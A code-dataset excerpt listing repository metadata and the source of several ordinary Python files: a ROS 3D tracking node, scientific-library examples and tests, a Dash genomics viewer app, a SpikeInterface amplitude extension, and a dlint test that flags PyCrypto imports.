blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d3e7302bc67c06a10f6f24fc9e0ad391a3bcd127
|
158bc330098e3f7db4ef858a58f1f79e78a6da09
|
/src/tracker_3d_node 2.py
|
2fb07e3885ea0fc12f7d48558e601bdab138f727
|
[
"MIT"
] |
permissive
|
StanfordVL/JRMOT_ROS
|
92e0a147e1e50d19f05fbc004e869411e313303c
|
ca1e87e51ecfeb14f2b652d613f3b02c592afb38
|
refs/heads/master
| 2023-02-21T06:53:13.185285
| 2022-02-01T17:27:43
| 2022-02-01T17:27:43
| 250,890,537
| 136
| 40
|
MIT
| 2023-02-15T21:43:03
| 2020-03-28T20:48:13
|
Python
|
UTF-8
|
Python
| false
| false
| 7,568
|
py
|
tracker_3d_node 2.py
|
#!/home/sibot/anaconda2/bin/python
""" yolo_bbox_to_sort.py
Subscribe to the Yolo 2 bboxes, and publish the detections with a 2d appearance feature used for reidentification
"""
import time
import rospy
import ros_numpy
import sys
import numpy as np
import torch
import os
import message_filters
from featurepointnet_model_util import generate_detections_3d, \
convert_depth_features
from featurepointnet_model import create_depth_model
from calibration import OmniCalibration
from jpda_rospack.msg import detection3d_with_feature_array, \
detection3d_with_feature, detection2d_with_feature_array
from tracking_utils import convert_detections, combine_features
from combination_model import CombiNet
from tracker_3d import Tracker_3d
from visualization_msgs.msg import MarkerArray, Marker
from std_msgs.msg import Int8
from geometry_msgs.msg import Pose, PoseWithCovariance
from spencer_tracking_msgs.msg import TrackedPerson, TrackedPersons
import pdb
class Tracker_3D_node:
def __init__(self):
self.node_name = "tracker_3d"
rospy.init_node(self.node_name)
rospy.on_shutdown(self.cleanup)
self.depth_weight = float(rospy.get_param('~combination_depth_weight', 1))
calibration_folder = rospy.get_param('~calib_3d', 'src/jpda_rospack/calib/')
calib = OmniCalibration(calibration_folder)
self.tracker = Tracker_3d(max_age=25, n_init=3,
JPDA=True, m_best_sol=10, assn_thresh=0.6,
matching_strategy='hungarian',
cuda=True, calib=calib, omni=True,
kf_vel_params=(0.08, 0.03, 0.01, 0.03,
1.2, 3.9, 0.8, 1.6),
dummy_node_cost_iou=0.9, dummy_node_cost_app=6,
nn_budget=3, dummy_node_cost_iou_2d=0.5)
combination_model_path = rospy.get_param('~combination_model_path', False)
if combination_model_path:
self.combination_model = CombiNet()
checkpoint = torch.load(combination_model_path)
self.combination_model.load_state_dict(checkpoint['state_dict'])
try:
combination_model.cuda()
except:
pass
self.combination_model.eval()
else:
self.combination_model = None
self.detection_2d_sub = \
message_filters.Subscriber("detection2d_with_feature",
detection2d_with_feature_array,
queue_size=5)
self.detection_3d_sub = \
message_filters.Subscriber("detection3d_with_feature",
detection3d_with_feature_array,
queue_size=5)
# self.detection_2d_sub.registerCallback(self.find_time_diff_2d)
# self.detection_3d_sub.registerCallback(self.find_time_diff_3d)
# self.last_seen_2d = 0
# self.last_seen_3d = 0
self.time_sync = \
message_filters.TimeSynchronizer([self.detection_2d_sub,
self.detection_3d_sub],
5)
self.time_sync.registerCallback(self.do_3d_tracking)
self.tracker_output_pub = rospy.Publisher("/jpda_output", TrackedPersons,
queue_size=30)
self.debug_pub = rospy.Publisher("/test", Int8, queue_size=1)
rospy.loginfo("Ready.")
def do_3d_tracking(self, detections_2d, detections_3d):
start = time.time()
#rospy.loginfo("Tracking frame")
# convert_detections
boxes_2d = []
boxes_3d = []
valid_3d = []
features_2d = []
features_3d = []
dets_2d = sorted(detections_2d.detection2d_with_features, key=lambda x:x.frame_det_id)
dets_3d = sorted(detections_3d.detection3d_with_features, key=lambda x:x.frame_det_id)
i, j = 0, 0
while i < len(dets_2d) and j < len(dets_3d):
det_2d = dets_2d[i]
det_3d = dets_3d[j]
if det_2d.frame_det_id == det_3d.frame_det_id:
i += 1
j += 1
valid_3d.append(det_3d.valid)
boxes_2d.append(np.array([det_2d.x1, det_2d.y1, det_2d.x2, det_2d.y2, 1, -1, -1]))
features_2d.append(torch.Tensor(det_2d.feature).to('cuda:0'))
if det_3d.valid:
boxes_3d.append(np.array([det_3d.x, det_3d.y, det_3d.z, det_3d.l, det_3d.h, det_3d.w, det_3d.theta]))
features_3d.append(torch.Tensor(det_3d.feature).to('cuda:0'))
else:
boxes_3d.append(None)
features_3d.append(None)
elif det_2d.frame_det_id < det_3d.frame_det_id:
i += 1
else:
j += 1
if not boxes_3d:
boxes_3d = None
features_3d, features_2d = combine_features(features_2d, features_3d,
valid_3d, self.combination_model,
depth_weight=self.depth_weight)
detections = convert_detections(boxes_2d, features_3d, features_2d, boxes_3d)
self.tracker.predict()
self.tracker.update(None, detections)
tracked_array = TrackedPersons()
tracked_array.header.stamp = detections_3d.header.stamp
tracked_array.header.frame_id = 'occam'
for track in self.tracker.tracks:
if not track.is_confirmed():
continue
#print('Confirmed track!')
pose_msg = Pose()
tracked_person_msg = TrackedPerson()
tracked_person_msg.header.stamp = detections_3d.header.stamp
tracked_person_msg.header.frame_id = 'occam'
tracked_person_msg.track_id = track.track_id
if track.time_since_update < 2:
tracked_person_msg.is_matched = True
else:
tracked_person_msg.is_matched = False
bbox = track.to_tlwh3d()
covariance = track.get_cov().reshape(-1).tolist()
pose_msg.position.x = bbox[0]
pose_msg.position.y = bbox[1] - bbox[4]/2
pose_msg.position.z = bbox[2]
pose_msg = PoseWithCovariance(pose=pose_msg, covariance=covariance)
tracked_person_msg.pose = pose_msg
tracked_array.tracks.append(tracked_person_msg)
self.tracker_output_pub.publish(tracked_array)
#rospy.loginfo("tracker time: {}".format(time.time() - start))
def find_time_diff_2d(self, a):
print(a.header.stamp - self.last_seen_3d)
self.last_seen_2d = a.header.stamp
def find_time_diff_3d(self, a):
print(a.header.stamp - self.last_seen_2d)
self.last_seen_3d = a.header.stamp
def cleanup(self):
print("Shutting down 3D tracking node.")
del self.combination_model
del self.tracker
del self.detection_2d_sub
del self.detection_3d_sub
del self.time_sync
del self.tracker_output_pub
def main(args):
try:
Tracker_3D_node()
rospy.spin()
except KeyboardInterrupt:
print("Shutting down 3D tracking node.")
if __name__ == '__main__':
main(sys.argv)
|
d49c804a6f49922efac34dee13e2423547be1bde
|
cf8182ecc88888719cfaff79751834500800151a
|
/examples/undocumented/python/graphical/so_multiclass_BMRM.py
|
22931e1743b8c71d8de5955287535b6c0ec4db66
|
[
"BSD-3-Clause",
"DOC",
"GPL-3.0-only"
] |
permissive
|
shogun-toolbox/shogun
|
17beb82a04fbf1179d300c4fcd16ee68850ad994
|
9b8d856971af5a295dd6ad70623ae45647a6334c
|
refs/heads/develop
| 2023-03-11T04:46:36.167073
| 2020-12-08T16:56:38
| 2020-12-08T16:56:38
| 1,555,094
| 2,938
| 1,246
|
BSD-3-Clause
| 2022-08-12T11:12:34
| 2011-04-01T10:44:32
|
C++
|
UTF-8
|
Python
| false
| false
| 2,678
|
py
|
so_multiclass_BMRM.py
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import shogun as sg
def fill_data(cnt, minv, maxv):
x1 = np.linspace(minv, maxv, cnt)
a, b = np.meshgrid(x1, x1)
X = np.array((np.ravel(a), np.ravel(b)))
y = np.zeros((1, cnt*cnt))
tmp = cnt*cnt;
y[0, tmp/3:(tmp/3)*2]=1
y[0, tmp/3*2:(tmp/3)*3]=2
return X, y.flatten()
def gen_data():
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(N, dim), covs[0]) + np.array([0, 10]),
np.dot(np.random.randn(N, dim), covs[1]) + np.array([-10, -10]),
np.dot(np.random.randn(N, dim), covs[2]) + np.array([10, -10])];
Y = np.hstack((np.zeros(N), np.ones(N), 2*np.ones(N)))
return X, Y
def get_so_labels(out):
N = out.get_num_labels()
l = np.zeros(N)
for i in xrange(N):
l[i] = sg.RealNumber.obtain_from_generic(out.get_label(i)).value
return l
# Number of classes
M = 3
# Number of samples of each class
N = 1000
# Dimension of the data
dim = 2
X, y = gen_data()
cnt = 250
X2, y2 = fill_data(cnt, np.min(X), np.max(X))
labels = sg.MulticlassSOLabels(y)
features = sg.RealFeatures(X.T)
model = sg.MulticlassModel(features, labels)
lambda_ = 1e1
sosvm = sg.DualLibQPBMSOSVM(model, labels, lambda_)
sosvm.set_cleanAfter(10) # number of iterations that cutting plane has to be inactive for to be removed
sosvm.set_cleanICP(True) # enables inactive cutting plane removal feature
sosvm.set_TolRel(0.001) # set relative tolerance
sosvm.set_verbose(True) # enables verbosity of the solver
sosvm.set_cp_models(16) # set number of cutting plane models
sosvm.set_solver(sg.BMRM) # select training algorithm
#sosvm.set_solver(sg.PPBMRM)
#sosvm.set_solver(sg.P3BMRM)
sosvm.train()
res = sosvm.get_result()
Fps = np.array(res.get_hist_Fp_vector())
Fds = np.array(res.get_hist_Fp_vector())
wdists = np.array(res.get_hist_wdist_vector())
plt.figure()
plt.subplot(221)
plt.title('Fp and Fd history')
plt.plot(xrange(res.get_n_iters()), Fps, hold=True)
plt.plot(xrange(res.get_n_iters()), Fds, hold=True)
plt.subplot(222)
plt.title('w dist history')
plt.plot(xrange(res.get_n_iters()), wdists)
# Evaluation
out = sosvm.apply()
Evaluation = sg.StructuredAccuracy()
acc = Evaluation.evaluate(out, labels)
print "Correct classification rate: %0.4f%%" % ( 100.0*acc )
# show figure
Z = get_so_labels(sosvm.apply(sg.RealFeatures(X2)))
x = (X2[0,:]).reshape(cnt, cnt)
y = (X2[1,:]).reshape(cnt, cnt)
z = Z.reshape(cnt, cnt)
plt.subplot(223)
plt.pcolor(x, y, z)
plt.contour(x, y, z, linewidths=1, colors='black', hold=True)
plt.plot(X[:,0], X[:,1], 'yo')
plt.axis('tight')
plt.title('Classification')
plt.show()
|
a6370784ae90329aac7852f8b58241ca092b49ee
|
63cb78527bcb90f984788587a29f8f115e94ab64
|
/tests/dashbio_demos/dash-igv/app.py
|
3fc4db08d161f332f5557856f9e65372ee0d85b7
|
[
"MIT"
] |
permissive
|
plotly/dash-bio
|
2b3468626c7f021c083c8b9170e61862d5dc151d
|
8a97db7811cc586d7e0bf1d33c17b898052b2e8f
|
refs/heads/master
| 2023-09-03T13:30:45.743959
| 2023-08-16T15:26:27
| 2023-08-16T15:26:27
| 141,365,566
| 505
| 228
|
MIT
| 2023-08-23T01:28:46
| 2018-07-18T01:40:23
|
Python
|
UTF-8
|
Python
| false
| false
| 6,363
|
py
|
app.py
|
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
import dash_bio
from layout_helper import run_standalone_app
text_style = {
'color': "#506784",
'font-family': 'Open Sans'
}
_COMPONENT_ID = 'igv-chart'
HOSTED_GENOME_DICT = [
{'value': 'hg38', 'label': 'Human (GRCh38/hg38)'},
{'value': 'hg19', 'label': 'Human (CRCh37/hg19)'},
{'value': 'hg18', 'label': 'Human (hg18)'},
{'value': 'mm10', 'label': 'Mouse (GRCm38/mm10)'},
{'value': 'rn6', 'label': 'Rat (RGCS 6.0/rn6)'},
{'value': 'gorGor4', 'label': 'Gorilla (gorGor4.1/gorGor4)'},
{'value': 'panTro4', 'label': 'Chimp (SAC 2.1.4/panTro4)'},
{'value': 'panPan2', 'label': 'Bonobo (MPI-EVA panpan1.1/panPan2)'},
{'value': 'canFam3', 'label': 'Dog (Broad CanFam3.1/canFam3)'},
{'value': 'ce11', 'label': 'C. elegans (ce11)'}
]
def description():
return 'A high-performance genomics viewer with an interactive UI and support for a ' \
'wide variety of data types and features.'
def header_colors():
return {
'bg_color': '#0F5BA7',
'font_color': 'white',
}
def layout():
return html.Div(id='igv-body', className='app-body', children=[
html.Div(id='igv-control-tabs', className='control-tabs', children=[
dcc.Tabs(
id='igv-tabs',
value='what-is',
children=[
dcc.Tab(
label='About',
value='what-is',
children=html.Div(className='control-tab', children=[
html.H4(className='what-is', children='What is IGV?'),
dcc.Markdown(
"""
The Dash IGV component is a high-performance genomics
data visualization component developed originally by the [IGV
Team](https://igv.org/) based at UC San Diego and the Broad
Institute. It offers
support for array-based and next-generation sequencing data,
and a smooth, interactive UI for real-time exploration of large
scale genomic data. This includes visualizing alignments,
copy number,
genome-wide interactions, gene expression and methylation, and more
data types. Data tracks, interactions, and analysis can be
controlled
by integrating with a Dash app to create a complete dynamic
workflow.
Read more about the component here:
https://github.com/igvteam/igv.js/
"""
)
])
),
dcc.Tab(
label='Data',
value='data',
children=html.Div(className='control-tab', children=[
html.Div(className='app-controls-block', children=[
html.Div(
className='fullwidth-app-controls-name',
children="Select a Genome"
),
dcc.Dropdown(
id='genome-dropdown',
options=HOSTED_GENOME_DICT,
value='rn6',
),
html.Div(
className='app-controls-desc',
children='Select a Genome Identifier to display the remotely '
'hosted '
'genome.'
),
]),
html.Hr(
className='igv-separator'
),
html.Div(
className='app-controls-block',
children=[
html.Div(className='app-controls-name',
children='Minimum Window Size'),
dcc.Slider(
className='control-slider',
id='minimum-bases',
value=100,
min=10,
max=200,
step=10,
marks=dict((i, str(i)) for i in range(10, 190, 30))
),
html.Div(
className='app-controls-desc',
children='Minimum window size in base pairs when zooming '
'in.'
),
],
),
])
)
]
)
]),
dcc.Loading(parent_className='dashbio-loading', id='igv-output'),
])
def callbacks(_app):
# Return the IGV component with the selected genome and base length
@_app.callback(
Output('igv-output', 'children'),
[Input('genome-dropdown', 'value'),
Input('minimum-bases', 'value')]
)
def return_igv(genome, bases):
return (
html.Div([
dash_bio.Igv(
id=_COMPONENT_ID,
genome=genome,
reference=None,
minimumBases=bases,
)
])
)
app = run_standalone_app(layout, callbacks, header_colors, __file__)
server = app.server
if __name__ == '__main__':
app.run_server(debug=True, port=8050)
|
6007cd0c845eb96df5770ea1a93994a5cd833e75
|
a3fea5ac50d2bc426d90451c2f225f5b488c40c7
|
/tests/descriptor/test_structures.py
|
b33e6bfa7484d48f91ba76ae9f4863eb5e5c7c27
|
[
"BSD-3-Clause"
] |
permissive
|
yoshida-lab/XenonPy
|
b58f5548cb89ae4ef52892bbe7dd886a52483d49
|
a1e733e4451706fc751699be884b1e1d318b3d56
|
refs/heads/master
| 2023-05-28T18:47:41.579346
| 2023-05-21T15:53:00
| 2023-05-21T15:53:00
| 117,819,602
| 122
| 62
|
BSD-3-Clause
| 2023-05-18T07:49:15
| 2018-01-17T10:13:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
test_structures.py
|
# Copyright (c) 2021. yoshida-lab. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from pathlib import Path
import pandas as pd
import pytest
from pymatgen.core import Structure as pmg_S
from xenonpy.descriptor import RadialDistributionFunction, Structures, OrbitalFieldMatrix
@pytest.fixture(scope='module')
def data():
# prepare path
pwd = Path(__file__).parent
cif1 = pmg_S.from_file(str(pwd / '1.cif'))
cif2 = pmg_S.from_file(str(pwd / '2.cif'))
# ignore numpy warning
import warnings
print('ignore NumPy RuntimeWarning\n')
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ndarray size changed")
cifs = pd.Series([cif1, cif2], name='structure')
yield cifs
print('test over')
def test_rdf(data):
RadialDistributionFunction().fit_transform(data)
assert True
def test_ofm(data):
OrbitalFieldMatrix().fit_transform(data)
assert True
def test_structure(data):
Structures().fit_transform(data)
assert True
if __name__ == "__main__":
pytest.main()
|
bb3291cecc8724566e567e30643299f9546c455b
|
302ce5ab1045ee93845608c96580c63d54d730af
|
/src/spikeinterface/postprocessing/spike_amplitudes.py
|
62a4e2c32086c17e88c420a02b017a8bfb162a98
|
[
"MIT"
] |
permissive
|
SpikeInterface/spikeinterface
|
f900b62720860b2881d2e6b5fa4441e0e560f625
|
ee2237b3f5ce2347b2ec9df90e97b0ee6c738dcf
|
refs/heads/main
| 2023-09-02T11:27:54.687021
| 2023-09-01T13:48:29
| 2023-09-01T13:48:29
| 196,581,117
| 295
| 133
|
MIT
| 2023-09-14T19:12:16
| 2019-07-12T13:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 9,891
|
py
|
spike_amplitudes.py
|
import numpy as np
import shutil
from spikeinterface.core.job_tools import ChunkRecordingExecutor, _shared_job_kwargs_doc, ensure_n_jobs, fix_job_kwargs
from spikeinterface.core.template_tools import get_template_extremum_channel, get_template_extremum_channel_peak_shift
from spikeinterface.core.waveform_extractor import WaveformExtractor, BaseWaveformExtractorExtension
class SpikeAmplitudesCalculator(BaseWaveformExtractorExtension):
"""
Computes spike amplitudes from WaveformExtractor.
"""
extension_name = "spike_amplitudes"
def __init__(self, waveform_extractor):
BaseWaveformExtractorExtension.__init__(self, waveform_extractor)
self._all_spikes = None
def _set_params(self, peak_sign="neg", return_scaled=True):
params = dict(peak_sign=str(peak_sign), return_scaled=bool(return_scaled))
return params
def _select_extension_data(self, unit_ids):
# load filter and save amplitude files
sorting = self.waveform_extractor.sorting
spikes = sorting.to_spike_vector(concatenated=False)
(keep_unit_indices,) = np.nonzero(np.in1d(sorting.unit_ids, unit_ids))
new_extension_data = dict()
for seg_index in range(sorting.get_num_segments()):
amp_data_name = f"amplitude_segment_{seg_index}"
amps = self._extension_data[amp_data_name]
filtered_idxs = np.in1d(spikes[seg_index]["unit_index"], keep_unit_indices)
new_extension_data[amp_data_name] = amps[filtered_idxs]
return new_extension_data
def _run(self, **job_kwargs):
if not self.waveform_extractor.has_recording():
self.waveform_extractor.delete_extension(SpikeAmplitudesCalculator.extension_name)
raise ValueError("compute_spike_amplitudes() cannot run with a WaveformExtractor in recordless mode.")
job_kwargs = fix_job_kwargs(job_kwargs)
we = self.waveform_extractor
recording = we.recording
sorting = we.sorting
all_spikes = sorting.to_spike_vector()
self._all_spikes = all_spikes
peak_sign = self._params["peak_sign"]
return_scaled = self._params["return_scaled"]
extremum_channels_index = get_template_extremum_channel(we, peak_sign=peak_sign, outputs="index")
peak_shifts = get_template_extremum_channel_peak_shift(we, peak_sign=peak_sign)
# put extremum_channels_index and peak_shifts in vector way
extremum_channels_index = np.array(
[extremum_channels_index[unit_id] for unit_id in sorting.unit_ids], dtype="int64"
)
peak_shifts = np.array([peak_shifts[unit_id] for unit_id in sorting.unit_ids], dtype="int64")
if return_scaled:
# check if has scaled values:
if not recording.has_scaled_traces():
print("Setting 'return_scaled' to False")
return_scaled = False
# and run
func = _spike_amplitudes_chunk
init_func = _init_worker_spike_amplitudes
n_jobs = ensure_n_jobs(recording, job_kwargs.get("n_jobs", None))
if n_jobs != 1:
# TODO: avoid dumping sorting and use spike vector and peak pipeline instead
assert sorting.check_if_dumpable(), (
"The sorting object is not dumpable and cannot be processed in parallel. You can use the "
"`sorting.save()` function to make it dumpable"
)
init_args = (recording, sorting.to_multiprocessing(n_jobs), extremum_channels_index, peak_shifts, return_scaled)
processor = ChunkRecordingExecutor(
recording, func, init_func, init_args, handle_returns=True, job_name="extract amplitudes", **job_kwargs
)
out = processor.run()
amps, segments = zip(*out)
amps = np.concatenate(amps)
segments = np.concatenate(segments)
for segment_index in range(recording.get_num_segments()):
mask = segments == segment_index
amps_seg = amps[mask]
self._extension_data[f"amplitude_segment_{segment_index}"] = amps_seg
def get_data(self, outputs="concatenated"):
"""
Get computed spike amplitudes.
Parameters
----------
outputs : str, optional
'concatenated' or 'by_unit', by default 'concatenated'
Returns
-------
spike_amplitudes : np.array or dict
The spike amplitudes as an array (outputs='concatenated') or
as a dict with units as key and spike amplitudes as values.
"""
we = self.waveform_extractor
sorting = we.sorting
if outputs == "concatenated":
amplitudes = []
for segment_index in range(we.get_num_segments()):
amplitudes.append(self._extension_data[f"amplitude_segment_{segment_index}"])
return amplitudes
elif outputs == "by_unit":
all_spikes = sorting.to_spike_vector(concatenated=False)
amplitudes_by_unit = []
for segment_index in range(we.get_num_segments()):
amplitudes_by_unit.append({})
for unit_index, unit_id in enumerate(sorting.unit_ids):
spike_labels = all_spikes[segment_index]["unit_index"]
mask = spike_labels == unit_index
amps = self._extension_data[f"amplitude_segment_{segment_index}"][mask]
amplitudes_by_unit[segment_index][unit_id] = amps
return amplitudes_by_unit
@staticmethod
def get_extension_function():
return compute_spike_amplitudes
WaveformExtractor.register_extension(SpikeAmplitudesCalculator)
def compute_spike_amplitudes(
waveform_extractor, load_if_exists=False, peak_sign="neg", return_scaled=True, outputs="concatenated", **job_kwargs
):
"""
Computes the spike amplitudes from a WaveformExtractor.
1. The waveform extractor is used to determine the max channel per unit.
2. Then a "peak_shift" is estimated because for some sorters the spike index is not always at the
peak.
3. Amplitudes are extracted in chunks (parallel or not)
Parameters
----------
waveform_extractor: WaveformExtractor
The waveform extractor object
load_if_exists : bool, default: False
Whether to load precomputed spike amplitudes, if they already exist.
peak_sign: str
The sign to compute maximum channel:
- 'neg'
- 'pos'
- 'both'
return_scaled: bool
If True and recording has gain_to_uV/offset_to_uV properties, amplitudes are converted to uV.
outputs: str
How the output should be returned:
- 'concatenated'
- 'by_unit'
{}
Returns
-------
amplitudes: np.array or list of dict
The spike amplitudes.
- If 'concatenated' all amplitudes for all spikes and all units are concatenated
- If 'by_unit', amplitudes are returned as a list (for segments) of dictionaries (for units)
"""
if load_if_exists and waveform_extractor.is_extension(SpikeAmplitudesCalculator.extension_name):
sac = waveform_extractor.load_extension(SpikeAmplitudesCalculator.extension_name)
else:
sac = SpikeAmplitudesCalculator(waveform_extractor)
sac.set_params(peak_sign=peak_sign, return_scaled=return_scaled)
sac.run(**job_kwargs)
amps = sac.get_data(outputs=outputs)
return amps
compute_spike_amplitudes.__doc__.format(_shared_job_kwargs_doc)
def _init_worker_spike_amplitudes(recording, sorting, extremum_channels_index, peak_shifts, return_scaled):
worker_ctx = {}
worker_ctx["recording"] = recording
worker_ctx["sorting"] = sorting
worker_ctx["return_scaled"] = return_scaled
worker_ctx["peak_shifts"] = peak_shifts
worker_ctx["min_shift"] = np.min(peak_shifts)
worker_ctx["max_shifts"] = np.max(peak_shifts)
worker_ctx["all_spikes"] = sorting.to_spike_vector(concatenated=False)
worker_ctx["extremum_channels_index"] = extremum_channels_index
return worker_ctx
def _spike_amplitudes_chunk(segment_index, start_frame, end_frame, worker_ctx):
# recover variables of the worker
all_spikes = worker_ctx["all_spikes"]
recording = worker_ctx["recording"]
return_scaled = worker_ctx["return_scaled"]
peak_shifts = worker_ctx["peak_shifts"]
seg_size = recording.get_num_samples(segment_index=segment_index)
spike_times = all_spikes[segment_index]["sample_index"]
spike_labels = all_spikes[segment_index]["unit_index"]
d = np.diff(spike_times)
assert np.all(d >= 0)
i0 = np.searchsorted(spike_times, start_frame)
i1 = np.searchsorted(spike_times, end_frame)
n_spikes = i1 - i0
amplitudes = np.zeros(n_spikes, dtype=recording.get_dtype())
if i0 != i1:
# some spike in the chunk
extremum_channels_index = worker_ctx["extremum_channels_index"]
sample_inds = spike_times[i0:i1].copy()
labels = spike_labels[i0:i1]
# apply shifts per spike
sample_inds += peak_shifts[labels]
# get channels per spike
chan_inds = extremum_channels_index[labels]
# prevent border accident due to shift
sample_inds[sample_inds < 0] = 0
sample_inds[sample_inds >= seg_size] = seg_size - 1
first = np.min(sample_inds)
last = np.max(sample_inds)
sample_inds -= first
# load trace in memory
traces = recording.get_traces(
start_frame=first, end_frame=last + 1, segment_index=segment_index, return_scaled=return_scaled
)
# and get amplitudes
amplitudes = traces[sample_inds, chan_inds]
segments = np.zeros(amplitudes.size, dtype="int64") + segment_index
return amplitudes, segments
|
b9c26d3e13bd09409698a2ac7242462064919aff
|
9907672fcd81ab73ac63b2a83422a82bf31eadde
|
/spoj/tyama_spojBEANONE.py
|
0dc06651b3d19d8c53da04ec961d0624517d1335
|
[
"0BSD"
] |
permissive
|
cielavenir/procon
|
bbe1974b9bddb51b76d58722a0686a5b477c4456
|
746e1a91f574f20647e8aaaac0d9e6173f741176
|
refs/heads/master
| 2023-06-21T23:11:24.562546
| 2023-06-11T13:15:15
| 2023-06-11T13:15:15
| 7,557,464
| 137
| 136
| null | 2020-10-20T09:35:52
| 2013-01-11T09:40:26
|
C++
|
UTF-8
|
Python
| false
| false
| 170
|
py
|
tyama_spojBEANONE.py
|
#!/usr/bin/python
from functools import reduce
import sys
if sys.version_info[0]>=3: raw_input=input
n=int(raw_input())+3
print(reduce(lambda x,y:x*y,range(1,n+1))-n*n+1)
|
2263765ad708e8b0311ce1afd7f6a15e80391dfb
|
467be8fc9c975638fcb7a64d098e1526fd1c96f0
|
/tests/test_bad_pycrypto_use.py
|
42644af2fceec8dfdc1d53e10d4bf423fcba72de
|
[
"BSD-3-Clause"
] |
permissive
|
dlint-py/dlint
|
ed8d2ca0446914fceded654a2b810b7f8ad0d9d3
|
307b301cd9e280dcd7a7f9d5edfda3d58e4855f5
|
refs/heads/master
| 2023-04-13T08:54:52.987469
| 2023-04-10T19:27:01
| 2023-04-10T19:27:15
| 232,599,661
| 154
| 16
|
BSD-3-Clause
| 2023-03-09T21:21:19
| 2020-01-08T15:53:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
test_bad_pycrypto_use.py
|
#!/usr/bin/env python
import unittest
import dlint
class TestBadPycryptoUse(dlint.test.base.BaseTest):
def test_bad_pycrypto_usage(self):
python_node = self.get_ast_node(
"""
import Crypto
"""
)
linter = dlint.linters.BadPycryptoUseLinter()
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=2,
col_offset=0,
message=dlint.linters.BadPycryptoUseLinter._error_tmpl
)
]
assert result == expected
def test_bad_pycrypto_from_usage(self):
python_node = self.get_ast_node(
"""
from Crypto import AES
"""
)
linter = dlint.linters.BadPycryptoUseLinter()
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=2,
col_offset=0,
message=dlint.linters.BadPycryptoUseLinter._error_tmpl
)
]
assert result == expected
if __name__ == "__main__":
unittest.main()
|
7a2e067e577474bf7a9005f3709e99f9a556db55
|
a6c05f5bea011ddce375c4a31e52e04bcb2ee053
|
/dataprep/tests/eda/test_plot_diff.py
|
3ad059faa6d695cc8cbb55f6d83fe9778c0380d0
|
[
"MIT"
] |
permissive
|
sfu-db/dataprep
|
8db4286f4eccfde9e00b4e4fe4ac7d0fd567d9f1
|
17eda6925b9c37200eae969813ed41583d225989
|
refs/heads/develop
| 2023-08-18T09:01:04.057248
| 2023-05-30T02:39:47
| 2023-08-03T04:05:43
| 186,311,346
| 1,755
| 215
|
MIT
| 2023-08-03T04:05:45
| 2019-05-12T22:37:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,583
|
py
|
test_plot_diff.py
|
"""
module for testing plot_diff([df1, df2, ..., dfn]) function.
"""
import logging
import dask.dataframe as dd
import numpy as np
import pandas as pd
import pytest
from ...eda import plot_diff
from ...datasets import load_dataset
from ...eda.dtypes import Nominal
from ...eda.utils import to_dask
LOGGER = logging.getLogger(__name__)
@pytest.fixture(scope="module") # type: ignore
def simpledf() -> dd.DataFrame:
df = pd.DataFrame(np.random.rand(1000, 3), columns=["a", "b", "c"])
df = pd.concat([df, pd.Series(np.random.choice(["a", "b", "c"], 1000, replace=True))], axis=1)
df = pd.concat(
[
df,
pd.Series(
np.random.choice(["2020/03/29", "2020/01/10", "2019/11/21"], 1000, replace=True)
),
],
axis=1,
)
df = pd.concat([df, pd.Series(np.zeros(1000))], axis=1)
df.columns = ["a", "b", "c", "d", "e", "f"]
df["e"] = pd.to_datetime(df["e"])
# test when column is object but some cells are numerical
df["g"] = pd.Series([0, "x"] * 500)
idx = np.arange(1000)
np.random.shuffle(idx)
df.iloc[idx[:500], 0] = None
ddf = to_dask(df)
return ddf
def test_sanity_compute_mulitple_df(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf])
def test_sanity_compute_mulitple_column(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], "a")
def test_specify_column_type(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], dtype={"a": Nominal()})
plot_diff([simpledf, simpledf], dtype=Nominal())
def test_specify_label(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], config={"diff.label": ["label_1", "label_2"]})
def test_specify_label_col(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], "a", config={"diff.label": ["label_1", "label_2"]})
def test_specify_baseline(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], config={"diff.baseline": 1})
def test_specify_baseline_col(simpledf: dd.DataFrame) -> None:
plot_diff([simpledf, simpledf], "a", config={"diff.baseline": 1})
def test_col_not_align() -> None:
df2 = pd.DataFrame({"a": [1, 2], "c": ["a", "b"], "d": [2, 3]})
